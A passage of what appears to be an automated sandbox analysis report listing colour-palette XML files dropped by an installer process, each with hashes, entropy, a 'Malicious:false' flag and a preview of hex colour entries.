                                                                  SHA-512:0E9CFBBDD5321076473466249A86E500FE739014C81427B8BB5B54BCE05058C708354236E2285F554A928844E05AE3C49A2F0AA52E10183BF4DD51372E539D4D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Topographic" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#0000a8" alpha="255" />. <Color colorName="#0400ac" alpha="255" />. <Color colorName="#0408ac" alpha="255" />. <Color colorName="#040cac" alpha="255" />. <Color colorName="#0410ac" alpha="255" />. <Color colorName="#0814b0" alpha="255" />. <Color colorName="#0818b0" alpha="255" />. <Color colorName="#081cb0" alpha="255" />. <Color colorName="#0c20b0" alpha="255" />. <Color colorName="#0c24b4" alpha="255" />. <Color colorName="#1028b8" alpha="255" />. <Color colorName="#102cb8" alpha="255" />. <Color colorName="#1430b8" alpha="255" />. <Color colorName="#1434bc" alpha="255" />. <Color colorName="#1838c0" alpha="255" />. <Color colorName="#183cc0" alpha="255" />. <Color col
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Variette.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8830
                                                                  Entropy (8bit):4.5671771986729945
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8nlkH8SAt0mSYbVITiknTXtr167Ez2evNmPSA:9s0IGY5E
                                                                  MD5:957B5BE12E4CCCFF184C6071C61C36AF
                                                                  SHA1:11D10A14126BE7470E18F378B5B69817C479899A
                                                                  SHA-256:D5C5690730CA88EB9B4A072A5F08BFA3F91417637B6ADF0F29F7EF2BE5CE0335
                                                                  SHA-512:2A0EF16FF5D3B03696977148BAC7297C33ADDF9F76776E30B8BC1E43C4A6CE7C9B5D2F6945EA10387786C211E27EE6CE72499F5D53FD2CF1651D88891AC94AD2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Variette">. <Color colorName="#791179" alpha="255"/>. <Color colorName="#2e0c50" alpha="255"/>. <Color colorName="#1c061c" alpha="255"/>. <Color colorName="#060632" alpha="255"/>. <Color colorName="#0c2e50" alpha="255"/>. <Color colorName="#061c1c" alpha="255"/>. <Color colorName="#117979" alpha="255"/>. <Color colorName="#0c502e" alpha="255"/>. <Color colorName="#063206" alpha="255"/>. <Color colorName="#2e500c" alpha="255"/>. <Color colorName="#797911" alpha="255"/>. <Color colorName="#502e0c" alpha="255"/>. <Color colorName="#320606" alpha="255"/>. <Color colorName="#500c2e" alpha="255"/>. <Color colorName="#100b07" alpha="255"/>. <Color colorName="#020202" alpha="255"/>. <Color colorName="#b01ab0" alpha="255"/>. <Color colorName="#52158f" alpha="255"/>. <Color colorName="#401040" alpha="255"/>. <Color colorName="#101071" alpha="255"/>. <Color colorName="#15528f" alpha="255"/>. <Color colorName="#104040" alpha="2
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Visibone.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):14542
                                                                  Entropy (8bit):4.457407380984402
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8wEyqE87qkKy3sSy3Kk7q8EEyqKKKKKKy1qtqwKKKKKKKKKKKKO8SWKKKKKKK4:c85+k+ze4s2LGB/zpALKAZ+F+oER8qYW
                                                                  MD5:D7935AB5CD93D1AC36639609740FE8C5
                                                                  SHA1:756D7CFDD3EBF4E6B6594DAB656804C9A949AB60
                                                                  SHA-256:240022708AADC9DE04A47D17D44E0648A5FA787909B397D26205913C8D586C5F
                                                                  SHA-512:EF7DFA55A53B5E3A7D2CAF5301176B02437B3B6D3CFFA5A608A91E70992D14670DC6092E0AB565D6704A4F001C231DCDA3B4D03074CE06C9B6450FDC2D5F050F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Visibone" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff6600" alpha="255" />. <Color colorName="#ff3300" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Visibone2.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11104
                                                                  Entropy (8bit):4.490036673630926
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8qEyqE87qkKy3sSy3Kk7q8EEyq61KKKKOy1qtqwWKKKKGmty2y83Wy8SoGg1IE:c8H+29i4EDukGyO2c6n+ACYA57IYjAXr
                                                                  MD5:929BC840F457F02152D76C36B8B3F76C
                                                                  SHA1:8E99E3468F795AB7DB375D4765163C8A2DFCA471
                                                                  SHA-256:5F58F06C3E8039E96B8C7E8501DF216A662F1C3676D7070EAF30EE3950F16C2D
                                                                  SHA-512:8CC63902403697DDF04D3A9BB5F5E6DADFEDA8FFB818710F47F191904B95D240F60633D4954F71941266DD59F3135060A836C6E46B9DBE6C6A92CB79DBF85552
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Visibone 2" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff6600" alpha="255" />. <Color colorName="#ff3300" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#99cc00" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Volcano.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.444903693252684
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8yqN8JZ9BBJKEA2NPFY+VhqXHsNUHkHh6llDt6PF84:9yzBJPhNPFY+LuHsikH0lL6PF84
                                                                  MD5:06AD34D97673F018B4A397407D163B34
                                                                  SHA1:F1B2339D19C9C0D151E682730949CDE90B43BDED
                                                                  SHA-256:C4EB60418A9A1976272CBFA8BDA1905EFC16C57B70222243B61515B43F9784FC
                                                                  SHA-512:44AE89194C9AB3341F22A94459571D888B99178D0EFE2286CBFEDE7200A866A9487797DBB1F9AC561C459FD1BCCDF00D14488C7F279FFE30E4313E3902CD6F0D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Volcano" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000008" alpha="255" />. <Color colorName="#000010" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000028" alpha="255" />. <Color colorName="#000030" alpha="255" />. <Color colorName="#000038" alpha="255" />. <Color colorName="#000040" alpha="255" />. <Color colorName="#000048" alpha="255" />. <Color colorName="#000054" alpha="255" />. <Color colorName="#00005c" alpha="255" />. <Color colorName="#000064" alpha="255" />. <Color colorName="#00006c" alpha="255" />. <Color colorName="#000074" alpha="255" />. <Color colorName="#00007c" alpha="255" />. <Color colorName="#000084" alpha="255" />. <Color colorName="#00008c" alpha="255" />. <Color colorName="#000094" alpha="255" />. <Color colorName="#00009c" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\WarmColors.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):398
                                                                  Entropy (8bit):4.786642697917537
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd80r/eXhgeBLge6hgeMge+Qge9lnhgezwhg:2d88/dxDqKXaqi9
                                                                  MD5:E3F9D7B9210F7E693BA274C9F1EFD643
                                                                  SHA1:711F6AF005D43DEDCE383217CA4AE5628EC720BE
                                                                  SHA-256:0CBF6BDD03CC6B947BA4673860A294D69968F82BC4E4FA9C36EEC2A1219AAB3C
                                                                  SHA-512:D46A033CA4EBC22B965B87AA01E2D011835EC76E396B2B63B79FC0EFD68751254A502736532F7E738F3D9841EB03A7AAC2B0F50B9BE18B08A063C6E09CC53BC2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Warm Colors" >. <Color colorName="#c40909" alpha="255" />. <Color colorName="#d8d508" alpha="255" />. <Color colorName="#ed6e00" alpha="255" />. <Color colorName="#e80032" alpha="255" />. <Color colorName="#8c0b0b" alpha="255" />. <Color colorName="#e4aa04" alpha="255" />. <Color colorName="#750000" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Web.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):9377
                                                                  Entropy (8bit):4.493251477050456
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8hEyqQe37qQyVqSa1qyy3tqaCtqaskyqw+3bqwSVqSa1qyy3/qU8vnqUmVqSam:c8tb1Io2Co2tkCwcCwi+cI+cpFpe+4xs
                                                                  MD5:E35F1C80A2CAE673B1841E64ECCC04A8
                                                                  SHA1:047D14A9C6DC6C6B7D81CC38B8F5693DF7F5AFB2
                                                                  SHA-256:6A1FC50707D75A35E1728D78A270CF345B0E36A0206FC147401574B80892C507
                                                                  SHA-512:777E4C700138E18DAD2AA90CEDAA00DCCE279A6F552D2215A7FE765474BB5C20EC3AE7D0BA5A04CC7F5AFF6361C80E743C10433F80564B4AD281E6ECA3D456D0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Web" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#ffffcc" alpha="255" />. <Color colorName="#ffff99" alpha="255" />. <Color colorName="#ffff66" alpha="255" />. <Color colorName="#ffff33" alpha="255" />. <Color colorName="#ffff00" alpha="255" />. <Color colorName="#ffccff" alpha="255" />. <Color colorName="#ffcccc" alpha="255" />. <Color colorName="#ffcc99" alpha="255" />. <Color colorName="#ffcc66" alpha="255" />. <Color colorName="#ffcc33" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff99ff" alpha="255" />. <Color colorName="#ff99cc" alpha="255" />. <Color colorName="#ff9999" alpha="255" />. <Color colorName="#ff9966" alpha="255" />. <Color colorName="#ff9933" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff66ff" alpha="255" />. <Color colorName="#ff66cc" alpha="255" />. <Color colorName="#ff6699" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-06DJR.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11098
                                                                  Entropy (8bit):4.482834229821559
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8ulntN1hdL4jwBhhhuaaamQQQX111yiii1:9ulnDBhhhuaaamQQQj
                                                                  MD5:7977E01B76DB83866358B2B41322C15F
                                                                  SHA1:DCCE15C205F55D57BF4BB8D0BE9191773E7B8B6F
                                                                  SHA-256:88C2044553D083F0C61349F5F0A07B31EDD8CE09F1CE72AF3863835DFB69BC7C
                                                                  SHA-512:D087A7C58040224BB5433A825D63DDCBBDC61D8D6CF97A06EEA0EB259FB5D6FE738B5DEFEBD6B14A977BC49B9C70DB0F8EC6DB3371B5961E603A88EF68D3B890
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Gold" >. <Color colorName="#fcfc80" alpha="255" />. <Color colorName="#fcfc80" alpha="255" />. <Color colorName="#fcf87c" alpha="255" />. <Color colorName="#fcf87c" alpha="255" />. <Color colorName="#fcf478" alpha="255" />. <Color colorName="#f8f478" alpha="255" />. <Color colorName="#f8f074" alpha="255" />. <Color colorName="#f8f070" alpha="255" />. <Color colorName="#f8ec70" alpha="255" />. <Color colorName="#f4ec6c" alpha="255" />. <Color colorName="#f4e86c" alpha="255" />. <Color colorName="#f4e868" alpha="255" />. <Color colorName="#f4e468" alpha="255" />. <Color colorName="#f0e464" alpha="255" />. <Color colorName="#f0e060" alpha="255" />. <Color colorName="#f0e060" alpha="255" />. <Color colorName="#f0dc5c" alpha="255" />. <Color colorName="#ecdc5c" alpha="255" />. <Color colorName="#ecd858" alpha="255" />. <Color colorName="#ecd854" alpha="255" />. <Color colorName="#ecd454" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-0751V.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11098
                                                                  Entropy (8bit):4.499168530426374
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8xKTTm66+YjNjNFJJpg9g9Eo9mmTHHbvvyOKKKOOOyyyffLLzfffrrettett2j:c8F12id+7qB588X1IMUAYtxqYSrzpFR3
                                                                  MD5:9B5531846D0388433E93946C9E82ABA2
                                                                  SHA1:8F96AEA64516500ACAF5334C3931E071939C7238
                                                                  SHA-256:DE61CCAE472FEA6182EF56B3E13716FAB0E1EF2B53AF65F71E3E76309F4038BC
                                                                  SHA-512:AF7E9151ECB1A82F3042D270782966C4CFAEE11F95836C149EECB078786AAEFB4C8FC7B8BBAA48649A60CFC1A2AECD21E09E75AC0A5873D17ED97B825E677D31
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Reds" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#4c0000" alpha="255" />. <Color colorName="#4c0000" alpha="255" />. <Color colorName="#480000" alpha="255" />. <Color colorName="#440000" alpha="255" />. <Color colorName="#440000" alpha="255" />. <Color colorName="#400000" alpha="255" />. <Color colorName="#3c0000" alpha="255" />. <Color colorName="#380000" alpha="255" />. <Color colorName="#380000" alpha="255" />. <Color colorName="#340000" alpha="255" />. <Color colorName="#300000" alpha="255" />. <Color colorName="#300000" alpha="255" />. <Color colorName="#2c0000" alpha="255" />. <Color colorName="#280000" alpha="255" />. <Color colorName="#280000" alpha="255" />. <Color colorName="#240000" alpha="255" />. <Color colorName="#200000" alpha="255" />. <Color colorName="#1c0000" alpha="255" />. <Color colorName="#1c0000" alpha="255" />. <Color colorName="#180000" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-0IDAK.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11277
                                                                  Entropy (8bit):4.529508096715168
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8R/IYzL1PFJUq9I3Nzm3nZBFGVWaYi3fkfZqyDYAXdk2asC:96qQNunZBFgt3P2ax
                                                                  MD5:C2EDBBD8E83F46D9D2168DD6B56FAA30
                                                                  SHA1:0D769874B50281475FEAE4F7DFA65DF1AE258E74
                                                                  SHA-256:9CC6FDD6B5D1D85E74697355268DD3AAB25A8AD5E9A89891C98F4A78D88A91BA
                                                                  SHA-512:0E9CFBBDD5321076473466249A86E500FE739014C81427B8BB5B54BCE05058C708354236E2285F554A928844E05AE3C49A2F0AA52E10183BF4DD51372E539D4D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Topographic" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#0000a8" alpha="255" />. <Color colorName="#0400ac" alpha="255" />. <Color colorName="#0408ac" alpha="255" />. <Color colorName="#040cac" alpha="255" />. <Color colorName="#0410ac" alpha="255" />. <Color colorName="#0814b0" alpha="255" />. <Color colorName="#0818b0" alpha="255" />. <Color colorName="#081cb0" alpha="255" />. <Color colorName="#0c20b0" alpha="255" />. <Color colorName="#0c24b4" alpha="255" />. <Color colorName="#1028b8" alpha="255" />. <Color colorName="#102cb8" alpha="255" />. <Color colorName="#1430b8" alpha="255" />. <Color colorName="#1434bc" alpha="255" />. <Color colorName="#1838c0" alpha="255" />. <Color colorName="#183cc0" alpha="255" />. <Color col
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-58B2C.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1424
                                                                  Entropy (8bit):4.637437827073644
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8p1kqYeqC7+qP53qYMq/xqUt+qVUyqe+0MpqUIAOqKz+qwtL+qRnnqq+0Ypqvj:c8pGCCqq+e
                                                                  MD5:6D1133FBC427F3DA6A9C55EF7E2D7F58
                                                                  SHA1:EF743865A9FF382D2F3821505CA255CBA76CE9A6
                                                                  SHA-256:E3E4A67D02E7436F6A6C9905598A706E33FD2EBAD4FF935FA22DB9711B150405
                                                                  SHA-512:8FC006CE578B37083C219086B5C5ACC66069AF0A1375EF726741BD41389AF5A9372CA2BB4B8B26FDE74C0A7456E7F1AD59369ECE5BE26625DF562BC62353E49B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Grays" >. <Color colorName="#070707" alpha="255" />. <Color colorName="#0f0f0f" alpha="255" />. <Color colorName="#171717" alpha="255" />. <Color colorName="#1f1f1f" alpha="255" />. <Color colorName="#272727" alpha="255" />. <Color colorName="#2f2f2f" alpha="255" />. <Color colorName="#373737" alpha="255" />. <Color colorName="#3f3f3f" alpha="255" />. <Color colorName="#474747" alpha="255" />. <Color colorName="#4f4f4f" alpha="255" />. <Color colorName="#575757" alpha="255" />. <Color colorName="#5f5f5f" alpha="255" />. <Color colorName="#676767" alpha="255" />. <Color colorName="#6f6f6f" alpha="255" />. <Color colorName="#777777" alpha="255" />. <Color colorName="#7f7f7f" alpha="255" />. <Color colorName="#878787" alpha="255" />. <Color colorName="#8f8f8f" alpha="255" />. <Color colorName="#979797" alpha="255" />. <Color colorName="#9f9f9f" alpha="255" />. <Color colorName="#a7a7a7" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-78IGM.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1050
                                                                  Entropy (8bit):4.692876636956054
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8fHqjKwI0U0yjKNdEqqI0CD3cqpIoqwIb3LPXVqv:c8vExHt7oM
                                                                  MD5:68A91F330C057C4B09024F8A61D76683
                                                                  SHA1:D9E9A9A61B750FE5CA7691E754452242154B7088
                                                                  SHA-256:BEA0E70D85CD0E9BCC4E6083B88A4062DA73751CE3DF765587940AAA379D1BFF
                                                                  SHA-512:7EF53086C5D838DD2F5D6585FFBE52C06B5AF32EC5B1A721119AA58DEE1181D3D4EE62F83A734264FCD5C043FCEAAF29760DE623B383816B2D273B1CD83236A5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Browns And Yellows" >. <Color colorName="#bdb76b" alpha="255" />. <Color colorName="#f0e68c" alpha="255" />. <Color colorName="#eee8aa" alpha="255" />. <Color colorName="#fafad2" alpha="255" />. <Color colorName="#ffffe0" alpha="255" />. <Color colorName="#ffff00" alpha="255" />. <Color colorName="#ffd700" alpha="255" />. <Color colorName="#eedd82" alpha="255" />. <Color colorName="#daa520" alpha="255" />. <Color colorName="#b8860b" alpha="255" />. <Color colorName="#bc8f8f" alpha="255" />. <Color colorName="#8b4513" alpha="255" />. <Color colorName="#a0522d" alpha="255" />. <Color colorName="#cd853f" alpha="255" />. <Color colorName="#deb887" alpha="255" />. <Color colorName="#f5f5dc" alpha="255" />. <Color colorName="#f5deb3" alpha="255" />. <Color colorName="#f4a460" alpha="255" />. <Color colorName="#d2b48c" alpha="255" />. <Color colorName="#d2691e" alpha="255" />. <Color colorName="#ffa500" alpha="255" />. <Co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-7GG1Q.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1392
                                                                  Entropy (8bit):4.6762539584639615
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8YalGInuXj6sQT+qmldN4ij+q9l/qS3x3NVqdq3224qFt6b:c8YnI8BUlqUb
                                                                  MD5:CC4D6B5BC7601FBB0585C0B8FEC8330A
                                                                  SHA1:10C5BE7EF75CFD444FCCAE9B7D83AD3F9BACB5EB
                                                                  SHA-256:4B9AB374ABEE95D7E8A6E934848D9B450F6143338129871DA990F152541C88B4
                                                                  SHA-512:23C2E500F5857D5AB983E1473F9CBECF1AEE311F396D31EEC2D4D2AF503AC1874FEEADECD7AB93F9BCD3AA22B8ECFEC01D15AA427FA3712E24844C66612D95AA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Reds And Purples" >. <Color colorName="#cd5c5c" alpha="255" />. <Color colorName="#b22222" alpha="255" />. <Color colorName="#a52a2a" alpha="255" />. <Color colorName="#e9967a" alpha="255" />. <Color colorName="#fa8072" alpha="255" />. <Color colorName="#ffa07a" alpha="255" />. <Color colorName="#ff7f50" alpha="255" />. <Color colorName="#f08080" alpha="255" />. <Color colorName="#ff6347" alpha="255" />. <Color colorName="#ff4500" alpha="255" />. <Color colorName="#ff0000" alpha="255" />. <Color colorName="#ff69b4" alpha="255" />. <Color colorName="#ff1493" alpha="255" />. <Color colorName="#ffc0cb" alpha="255" />. <Color colorName="#ffb6c1" alpha="255" />. <Color colorName="#db7093" alpha="255" />. <Color colorName="#b03060" alpha="255" />. <Color colorName="#c71585" alpha="255" />. <Color colorName="#d02090" alpha="255" />. <Color colorName="#ff00ff" alpha="255" />. <Color colorName="#ee82ee" alpha="255" />. <Colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-8GPJJ.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):398
                                                                  Entropy (8bit):4.786642697917537
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd80r/eXhgeBLge6hgeMge+Qge9lnhgezwhg:2d88/dxDqKXaqi9
                                                                  MD5:E3F9D7B9210F7E693BA274C9F1EFD643
                                                                  SHA1:711F6AF005D43DEDCE383217CA4AE5628EC720BE
                                                                  SHA-256:0CBF6BDD03CC6B947BA4673860A294D69968F82BC4E4FA9C36EEC2A1219AAB3C
                                                                  SHA-512:D46A033CA4EBC22B965B87AA01E2D011835EC76E396B2B63B79FC0EFD68751254A502736532F7E738F3D9841EB03A7AAC2B0F50B9BE18B08A063C6E09CC53BC2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Warm Colors" >. <Color colorName="#c40909" alpha="255" />. <Color colorName="#d8d508" alpha="255" />. <Color colorName="#ed6e00" alpha="255" />. <Color colorName="#e80032" alpha="255" />. <Color colorName="#8c0b0b" alpha="255" />. <Color colorName="#e4aa04" alpha="255" />. <Color colorName="#750000" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-9317F.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.521556963759047
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8DeI2flNO3yyNz91Vq8KUW0nIXPmNxweKJnYmk:9Dyfq3yyN5nPKUWoNzWk
                                                                  MD5:727A77A194920C12112A37B86BF2016D
                                                                  SHA1:4EBC1EBF20292177CF1748CE06F3E1E7F1B4D313
                                                                  SHA-256:545E65456068FB051E3D665DE7B7966F29FB92B8DC580486D0080DBBABB4BFE1
                                                                  SHA-512:CB58307E2730FAF0E80AA686057A545F30EE7A51F22430990223D7E32BD5A628E09147963DB6904E49F54F9071E5C4CC10F9A8DA8DA3DBA8AC6A3A5FB6ABD0F9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Plasma" >. <Color colorName="#f0f000" alpha="255" />. <Color colorName="#f0e000" alpha="255" />. <Color colorName="#f0d000" alpha="255" />. <Color colorName="#f0c000" alpha="255" />. <Color colorName="#f0b000" alpha="255" />. <Color colorName="#f0a000" alpha="255" />. <Color colorName="#f09000" alpha="255" />. <Color colorName="#f08000" alpha="255" />. <Color colorName="#f07000" alpha="255" />. <Color colorName="#f06000" alpha="255" />. <Color colorName="#f05000" alpha="255" />. <Color colorName="#f04000" alpha="255" />. <Color colorName="#f03000" alpha="255" />. <Color colorName="#f02000" alpha="255" />. <Color colorName="#f01000" alpha="255" />. <Color colorName="#f00000" alpha="255" />. <Color colorName="#e0e010" alpha="255" />. <Color colorName="#e0d410" alpha="255" />. <Color colorName="#e0c810" alpha="255" />. <Color colorName="#e0b810" alpha="255" />. <Color colorName="#e0ac0c" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-9FS2B.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):441
                                                                  Entropy (8bit):4.778302988981003
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd89y/eFahgerwgegnhgeygewgemge5geMWhhg:2d89y/SaquNFnqg+QRB9
                                                                  MD5:0117B756BA1ADF57FC7174E4CA129F9B
                                                                  SHA1:73991BF7AB90C93C83C253459A96F09C3A8A30B6
                                                                  SHA-256:8EAC6B815D8592CA469F73EA7EB135A59CB1D01240341BD2B25122C078EF7969
                                                                  SHA-512:BE410F4AC8086FDCBB7AFAFCBC14972EB9A7FEBB7697EC5F0E7554D2403E9B928ECF999BB1CCC6EC0255D0C978D9EA6E602296435C1CB20B130022CE560EF343
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cool Colors" >. <Color colorName="#112ac6" alpha="255" />. <Color colorName="#539be2" alpha="255" />. <Color colorName="#161066" alpha="255" />. <Color colorName="#40234c" alpha="255" />. <Color colorName="#073f93" alpha="255" />. <Color colorName="#2c6ccc" alpha="255" />. <Color colorName="#265121" alpha="255" />. <Color colorName="#04422c" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-9OHE8.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
